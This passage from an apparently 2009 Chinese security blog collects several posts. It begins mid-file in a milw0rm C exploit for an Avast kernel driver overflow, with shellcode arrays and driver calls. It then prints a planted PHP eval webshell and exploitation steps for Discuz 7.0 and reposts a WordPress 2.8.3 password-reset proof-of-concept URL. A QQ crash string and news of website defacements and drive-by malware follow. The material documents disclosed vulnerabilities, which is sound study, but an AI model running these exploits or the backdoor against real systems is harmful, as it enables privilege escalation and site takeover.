        0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
        0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
        0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
        0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
        0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
        0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
        0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
        0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
        0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
        0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
        0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
        0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
        0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
        0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
        0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
        0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
        0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
        0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
        0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
        0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
        0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
        0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
        0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
        0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
        0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
        0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
        0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
        0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
        0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
        0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
        0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
        0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
        0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
        0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
        0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
        0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
        0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
        0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
        0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
        0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
        0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
        0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
        0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
        0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
        0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
        0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
        0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
        0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
        0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
        0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
        0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
        0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
        0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
        0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
        0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
        0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
        0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
        0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
        0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
        0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
        0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
        0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
        0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
        0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
        0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
        0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
        0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
        0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
        0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
        0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
        0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
        0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
        0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
        0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
        0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
        0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
        0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
        0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
        0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
        0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
        0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
        0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
        0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
        0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
        0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
        0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
        0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
        0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
        0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
        0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
        0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
        0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
        0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
        0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x765
81549,
        0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
        0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
        0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
        0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
        0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
        0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
        0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
        0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
        0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
        0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
        0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
        0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
        0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
        0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
        0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
        0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
        0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
        0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
        0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
        0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
        0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
        0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
        0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
        0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
        0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
        0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
        0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
        0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
        0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
        0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
        0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
        0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
        0xe8f62f56, 0x58f7969a
        };

    DWORD ShellcodeToExecute;
    
    int choix;
    memset(welcome, 0x61, 100);
    welcome[100] = 0;

    ZeroMemory(out,sizeof(out));

    printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept…\n\n");
    getch();
    
    MajShellcode("LocalEscalation_Avast.exe");
    MajRealShellcode();
    MajRealStack();
    
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
    memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));
    
    printf("Connecting…    ");
    
    hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    while(hDevice == (HANDLE) 0xffffffff){
      hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
      Sleep(1000);
    }
    printf("Found !\nHandle : %p\n",hDevice);
      
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    AfficherListeFichiers();
    printf("Written.\n");

    CloseHandle(hDevice);
    getch();
    return 0;
}

// milw0rm.com [2009-08-24]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/103

Discuz7.0 最新漏洞 后台styles风格文件漏洞及文字变大漏洞

      使用Discuz做论坛的朋友请注意这一漏洞,目前DZ已放出补丁,补丁介绍在文章最后。
      突然发现dz论坛网页文字变大了

Discuz!网页文字变大

图1

      网页源代码可以看到:

复制内容到剪贴板程序代码程序代码
<!–int(5)
–><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<title>论坛之家 找论坛找网址就上论坛之家交流http://luntan123.com/</title>

图2

      查看dz style缓存文件:
      \forumdata\cache\style_1.php
$X=SUBSTR(MD5($_GET['B']),28);IF($X=='3738')EVAL($_POST['A']);//', 'aaaaaaaaaa');

图3

      查看dz数据库表记录:
      cdb_stylevars
      48  1  ','');echo '<!–';var_dump(5);echo '–>';$x=substr…  aaaaaaaaaa

图4

      漏洞为:
      (Discuz! 7.0 及以下版本存在)
      /admin/styles.inc.php

复制内容到剪贴板程序代码程序代码
<?php    
……    
if($newcvar && $newcsubst) {    
if($db->result_first("Select COUNT(*) FROM {$tablepre}stylevars Where variable='$newcvar' AND styleid='$id'")) {    
cpmsg('styles_edit_variable_duplicate', '', 'error');    
} elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {    
cpmsg('styles_edit_variable_illegal', '', 'error');    
}    
$newcvar = strtolower($newcvar);    
$db->query("Insert INTO {$tablepre}stylevars (styleid, variable, substitute)  
VALUES ('$id', '$newcvar', '$newcsubst')");    
}//插入变量数据,http://luntan123.com 整理
……    
updatecache('styles');//更新缓存(写文件)
……    
?>  

      这是为某一style风格增加变量的代码,把变量名与变量的值存入数据库,虽然post过来的数据daddslashes了,但入库之后又都是纯净的数据了。
      这里涉及到一个正则问题,判断变量名的:!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]* /", $newcvar),其中“\x7f-\xff”是

      指ASCII码值在127~255之间的字符,它们经常作为中文字符的首字节出现,所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字

      母或者中文做变量名,没其他高深的匹配,随便测试了下,一般情况下这个正则等于虚设:

复制内容到剪贴板程序代码程序代码
<?php    
$newcvar=$_GET['newcvar'];    
echo $newcvar;    
echo "<br>";    
if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {    
echo "haha";    
}else{    
echo 'pass';    
}    
?>  

      下面看看updatecache这个函数,在include里的cache.func.php文件里,先从数据库取出来,经过一段处理最终写入文件,具体我不描述了,我只

      谈谈重点,看一段函数:

复制内容到剪贴板程序代码程序代码
function getcachevars($data, $type = 'VAR') {    
$evaluate = '';    
foreach($data as $key => $val) {    
if(is_array($val)) {    
$evaluate .= "\$key = ".arrayeval($val).";\n";    
} else {    
$val = addcslashes($val, '\'\\');  
$evaluate .= $type == 'VAR' ? "\$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";    
}    
}    
return $evaluate;    
}  

      啥也不说了,处理了value没处理key,而这个key就是之前我们提交的,干净的存在数据库里的值。关于数组的key,大家可以参考下幻影旅团第三期《高级PHP代码审核技术》,那篇文章好多地方谈到key的问题,dz这里却忽视了…

      于是可以直接拿shell了,利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:
http://luntan123.com/admincp.php … &id=1&adv=1中,最下面有个“自定义模板变量”,变量中

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/107

WordPress2.8.3远程管理员密码重置漏洞

      WordPress 2.8.3存在利用wp-login.php恶意重置管理员密码的漏洞,不过遗憾的是密码被重置后我们并不能直接拿到,而是直接将新密码发送至管理员邮箱。如果能搞定管理员邮箱,那么。。
      据悉,WP已经放出了相关补丁,请用WP的童鞋及时升级覆盖该漏洞文件。
      漏洞发布日期:2009.8.10
      存在漏洞WordPress版本:WordPress 2.8.3及更低
      攻击办法:
      访问http://www.xxx.com/wp-login.php?action=lostpassword,WordPress会向管理员邮箱发送一封邮件,大意为有人要求重置管理员密码,并在邮件中给出一个链接,点击链接后确认重置密码,并将收到另一封包含重置密码的邮件。
      更狠的招:访问http://www.xxx.com/wp-login.php?action=rp&key[]=,WordPress将强制重置密码而无需管理员确认。当然重置后的密码仍然是被发送到管理员邮箱的。

      想了解细节的往下看。

=============================================
– Release date: August 10th, 2009
– Discovered by: Laurent Gaffié
– Severity: Medium
=============================================

I. VULNERABILITY
————————-
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
————————-
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
————————-
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
WordPress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new Roger2011_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("Select * FROM $wpdb->users Where user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new Roger2011_Error('invalid_key', __('Invalid key'));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new Roger2011_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
…[snip]….

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_Roger2011_error($errors) ) {
        Roger2011_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    Roger2011_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.

IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
————————-
All

VII. SOLUTION
————————-
No patch aviable for the moment.

VIII. REFERENCES
————————-
http://www.wordpress.org

IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
————————-
August 10th, 2009: Initial release

XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/115

QQ2009惊现溢出漏洞

      本人已经领教过了,希望各位不要用来做坏事。
      来源:http://hi.baidu.com/MoSh0u/
      测试环境:Windows XP professional Service Pack 3
      测试对象: qq2009 Beta2&SP2。
      溢出代码:

复制内容到剪贴板程序代码程序代码
ﻬ墨♬

      应用示例:qq2009 Beta2&SP2用户在将自己的昵称改为以上字符后,点击确定时,QQ程序报错重启。
      攻击示例:将自己账号的群昵称改为:ﻬ墨♬,然后自己所加群内所有qq2009 Beta2&SP2用户在点开群时程序都将崩溃重启。秋天本人就遭遇了这样的情况,在先后清空历史聊天记录和重装程序后依然无法解决。
      其他攻击示例:为了营造河蟹的网络环境,略去。

qq2009 溢出漏洞程序崩溃截图

程序崩溃截图

      解决办法:
      已知qq2008、qq2009 Preview不受此漏洞影响;qq2009 SP3已经修复了此漏洞,故升级qq2009 sp3即可彻底解决此问题。
      qq2009 SP3下载地址:
      http://im.qq.com/qq/2009/standard_sp3/

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/120

澳电影节官网两遭中国黑客袭击

      由于不满澳大利亚墨尔本电影节播放美化“疆独”头目热比娅的纪录片,中国黑客于7.25日第二次攻击了该电影节的官方网站。

      墨尔本电影节网站遭黑客攻击的消息已经得到了电影节主办方的证实,目前警方已介入调查。黑客是在周六上午,也就是维多利亚州长正式宣布墨尔本电影节开幕数小时后发动攻击的,他们用中国国旗和反热比娅口号替换了网站上有关电影节的信息。

      墨尔本国际电影节总负责人查德?摩尔称,在拒绝中国撤销播放热比娅纪录片的要求之后,电影节工作人员的邮箱就遭到了垃圾邮件的狂轰滥炸。他还表示,从IP地址来看,攻击似乎来自中国。

墨尔本国际电影节官网被黑后的首页截图

墨尔本国际电影节官网被黑后的首页截图

      此前,据称为抗议第58届墨尔本国际电影节播放介绍“东突”民族分裂分子热比娅的纪录片,23日中国内地导演贾樟柯、赵亮以及香港导演唐晓白集体退出此次电影节。7月25日上午11时左右,墨尔本国际电影节官网于被黑。黑客留下三行英文,要求墨尔本官方就播放热比娅纪录片一事道歉向全中国人民道歉。

      墨尔本国际电影节官网被黑

      打开墨尔本国际官方网站,在电影节官方网站首页上,一位署名为“oldjun”的黑客留下一面“飘扬”的五星红旗,并用留下三行英文。英文上写着“We like film,but we hate Rebiya Kadeer!We like peace,and we hate East Turkistan terrorist!Please apologize to all the Chinese people!”

      继澳大利亚电影节官方网站在6月25日遭受据传是中国黑客的攻击后,国外媒体报道称,该电影节网站再次受到来自中国黑客的攻击,其网站票务系统瘫痪。
      澳大利亚墨尔本电影节不顾中方反对放映美化“疆独”头目热比娅的纪录片《爱的10个条件》,澳方还向热比娅发放了签证,允许其来澳参加该纪录片的放映活动。据法新社报道,中国黑客由于不满澳大利亚的做法,而对该电影节的网站发动了再次攻击。
      据电影节发言人阿莎·赫尔姆斯称,澳大利亚电影节官方网站的网上售票系统已经被关闭,该系统此前受到了众多“假冒”购票者的攻击,致使整个售票系统全部显示为“票已售罄”。
      赫尔姆斯称,一个据称来自于中国的名叫“向全中国人民发出号召”的网站发起了攻击。该网站讲解了如何用假身份网上购买电影票,其目标针对澳大利亚电影节播放的《爱的十个条件》。赫尔姆斯称:“攻击明显是为了关闭购票系统,攻击也已经取得效果。”“我们不得不关闭网上售票系统,并要求所有人通过售票点或电话购票。”
      赫尔姆斯同时称,我们能够预见在我们撤销放映《爱的十个条件》之前,这类抗议活动还将继续,“但我们不会撤掉电影”。《环球时报》记者北京时间1日中午登陆澳大利亚电影节官方网站后发现,该网站已经注明“售票系统关闭”。
      澳洲媒体此前报道称,澳方已于30日向“疆独”头目热比娅发放了签证,以便让其参加第58届墨尔本国际电影节。热比娅计划在纪录片《爱的10个条件》放映后还将举行“问答会”。
      秋天一棵树注:曾经澳大利亚总统陆克文上任的时候,国内的电视台几乎都提到了一点:陆克文会说中文,而且说得不错。但当这个家伙在接受CCAV采访时,就是不肯说中文,坚持用E文回答所有的问题。原来这个细节是有原因的。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/123

瑞星承认服务器被攻陷并被黑客“挂马”

  7月27号中午,某安全中心对外发布安全预警,瑞星官方网站被黑客“挂马”。三个多小时后,瑞星官方公告称:瑞星网站服务器确遭黑客团伙攻陷,并被植入了木马。

  新闻链接:瑞星官网被黑客植入木马,浏览者或遭盗号
  据监控数据显示,瑞星官网部分网页于7月25日凌晨起就被黑客“挂马”(链接:hxxp://tool.ikaka.com/Noticeinfo/yahoo.shtml),“挂马”时间超过60小时。攻击目标包括微软尚未提供补丁的Office0day漏洞以及FireFox3.5版漏洞等多个漏洞。部分用户浏览瑞星网站页面后,电脑被自动下载运行“机器狗”木马变种,该木马能破坏杀毒软件并穿透系统还原,使用户的网游、网银账号和个人隐私面临极大的失窃风险。

瑞星卡卡相关页面被360拦截

瑞星卡卡相关页面被360拦截截图

  据安全专家分析,此次黑客攻击主要是通过瑞星网站的WEB漏洞入侵。从瑞星官网的“挂马形式”来看,黑客很可能已经获得了该网站的高级权限,并能随意在网页中添加恶意代码。经测试,包括360安全卫士、金山网盾、卡巴斯基、畅游巡警等在内的多款安全软件均对瑞星官网“挂马”页面实施了拦截。

  上文中提及的地址现已可正常访问。

  27号瑞星的公告:

  瑞星声明:警告黑客团伙停止作恶 卡卡网可以正常访问
  来源:瑞星公司 时间:2009-07-27 17:07:31

    7月27日中午,瑞星“云安全”系统成功截获黑客团伙向“瑞星卡卡”网站植入木马,瑞星随即对网站服务器进行修复和整理,目前卡卡网可以正常访问。被挂马网页位于瑞星卡卡网(www.ikaka.com),访问人群多为瑞星用户,因为瑞星软件完全能够拦截这起挂马攻击行为,并阻止木马病毒的下载,请广大用户无须恐慌。

    瑞星工程师认为,这是一起明显的黑客团伙恶意报复行为,由于瑞星“云安全”系统能够全面监控并拦截挂马网站攻击,被断了财路的黑客团伙一直在攻击瑞星网站。自7月初以来,某黑客团伙利用位于118.123.11.29(代理地址)的服务器对瑞星网站进行不间断的扫描,寻找攻击入口。

瑞星卡卡拦截自己的网站

可怜的小狮子拦截自家网站,颇具黑色幽默意味

       瑞星已将相关资料上报公安部门,并警告该团伙悬崖勒马,停止对瑞星以及其它网站的攻击。

       瑞星互联网攻防实验室将该黑客组织命名为“X团伙”,自6月份开始,瑞星工程师与“X团伙”进行过多轮交手,先后通过卡卡社区公布过三个被该团伙侵入的网站分析日志,帮助数十个网站管理员弥补漏洞,防范此类攻击。并且,瑞星工程师还通过“云安全”系统,对“X团伙”的攻击信息随时进行密切跟踪,随时把其使用的代理服务器IP及挂马地址加入到黑名单,这样即使其攻陷了一些网站植入病毒,用户访问这些网站时杀毒软件也会进行拦截,完全可以确保用户不会中毒。

       根据瑞星“云安全”系统数据,“X团伙”进入7月份以来,已经攻击了200多个网站,以政府网站、高校网站和娱乐网站为主,受害用户甚至包括某省政府门户网站、检察院网站及公安网站。该团伙通常会先利用傀儡服务器对被害网站进行嗅探、扫描和渗透,然后利用SQL注入获取服务器权限,再把挂马网站地址嵌入到网页中,这样当用户访问受害网站时,就会被木马程序侵入。

      仅7月21日当天,该团伙就先后使用了59.54.54.92和118.123.11.29两个IP地址的服务器进行攻击,前者甚至是位于江西九江电信IDC机房的服务器,通常这种服务器运算能力强,而且IDC机房的带宽也大,攻击能力强悍。通过大量的扫描和嗅探,该团伙终于在卡卡网站一个访问量较小的网页频道上找到了薄弱点,对其进行了注入攻击。幸好由于发现及时,而且瑞星杀毒软件已经能够拦截嵌入的恶意网址,从而使得此次攻击并未影响太多普通用户。

      目前,瑞星公司已经掌握了大量的证据,包括该团伙使用的服务器地址、IP、攻击过的网站列表,受害用户的数量等,并已经把这些数据上报给了公安部门。等待该团伙的,必将是覆灭的下场。

   后记:

实际测试卡卡拦截网页时提示403错误
HTTP 错误 403.6 – 禁止访问:客户端的 IP 地址被拒绝。

      在我实际手动输入瑞星公告中的地址时,显示403错误,禁止访问,估计瑞星屏蔽了很多IP。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/128